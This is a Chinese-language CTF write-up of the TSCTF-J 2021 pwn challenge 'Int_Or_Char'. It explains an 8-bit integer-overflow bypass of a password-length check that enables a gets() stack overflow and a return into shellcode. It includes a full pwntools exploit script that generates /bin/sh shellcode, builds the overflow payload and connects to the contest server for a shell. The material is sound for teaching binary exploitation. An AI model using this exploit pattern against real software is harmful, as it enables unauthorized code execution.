跳到主要内容

「TSCTF-J_2021」Pwn - Int_Or_Char WriteUp

· 阅读需 5 分钟
MuelNova
Pwner who wants to write codes.

题目

初步确定思路

使用checksec查看一下文件,发现并没有开启 NX 和 PIE,则初步考虑 ret2text 和 ret2shellcode

checksec

分析代码

直接跳到pwn()函数开始看吧

int pwn()
{
char s[50]; // [esp+Dh] [ebp-3Bh] BYREF
unsigned __int8 v2; // [esp+3Fh] [ebp-9h]

puts("Plz input ur passwd:");
puts("Tip: The passwd length needs to be between 4 and 8 characters");
gets(s);
v2 = strlen(s);
return check(v2, s);
}

注意到gets(s)并没有限定长度,可以考虑在这里栈溢出。

来到check(v2, s)函数

char *__cdecl check(int a1, char *src)
{
if ( (unsigned __int8)a1 <= 3u || (unsigned __int8)a1 > 8u )
{
puts("So bad!");
puts("The passwd length needs to be between 4 and 8 characters");
exit(0);
}
puts("good length!");
return strcpy(passwd_buf, src);
}

这里要求我们的长度a1 > 3 && a1 <= 8,如果是这样的话我们很明显无法构造出我们想要的 payload, 这里可以参考攻防世界的Int_Overflow的 writeups 提到的整数溢出漏洞

一个通俗易懂的 C 语言例子

对于一个2字节的unsigned short int型变量,当它的数据长度超过 2 字节时,就会溢出,使用的数据也仅仅是最后两个字节

int main()
{
unsigned short int var1 = 1, var2 = 257; //var1 = 0x
if (var1 == var2)
{
printf("溢出");
}
return 0;
}
Out:
溢出

回到我们这题, 我们的v2是一个unsigned __int8的变量, 这意味着它的取值范围只有0~255那如果我们传入一个长度为256的数据,v2的值其实就变成了1(255 + 1), 这样一来,我们传入的长度可以到(255+4)~(255+8)也就是259-263个字符。

好的,绕过了字符长度检查,接下来又应该怎么利用这个漏洞呢?

char *strcpy(char *dest, const char *src);

这是strcpy的原型, 也就是说, src的内容会拷贝到dest所在的地址上,也就是题目中的passwd_buf

passwd_buf地址

我们来看一下栈堆

stack of check

这里我贴上 Mark 大爹的讲解:

性感Mark在线教学

理解较浅,原因什么的按下不表,等我去把 Pwn 入门了把栈整明白了再说()

前面提到,因为 NX 没开,所以我们的 buf 是可执行的,这也给了我们使用shellcode的条件,而且我们并没有调用系统指令的函数存在,因此必须糙一个 shellcode 出来

from pwn import *

context(os='linux', arch='i386', log_level='debug') # 指定了目标是32位系统, 下文

shellcode = asm(shellcraft.sh()) # 生成shellcode
buf_addr = 0x804A060 # buf地址
# print(shellcode)

payloadd = shellcode.ljust(0x3b, b'A') + b'A'*4 + p32(buf_addr) # 我们先把shellcode左对齐到栈底,再加上4字节的数据干掉rbp, 再加上p32(buf_addr) 即可跳转到buf_addr执行,也就是我们的shellcode
payloadd = payloadd + b'A'*(262-len(payloadd)) # 补齐payload以实现整数溢出漏洞
# print(len(payloadd))
# print(payloadd)
p = remote("45.82.79.42", 11001)

p.recvuntil("characters")
p.sendline(payloadd)
p.interactive()
# 此时已经拿到了shell, 该干什么就不用多说了8

在本 WriteUp 编写之前服务器已经 shutdown 了,所以没有获得 shell 之后的过程啦

个人总结

虽然在做这题的时候虽然整数溢出这个很快就实现了,如何运行 shellcode 却卡了很久(原因就是到达了栈底之后还要覆盖掉 rbp 才能跳转,在这之前我完全不理解为什么)

Pwn 真是太有意思辣

参考资料

ret2shellcode

Mark 大爹

Loading Comments...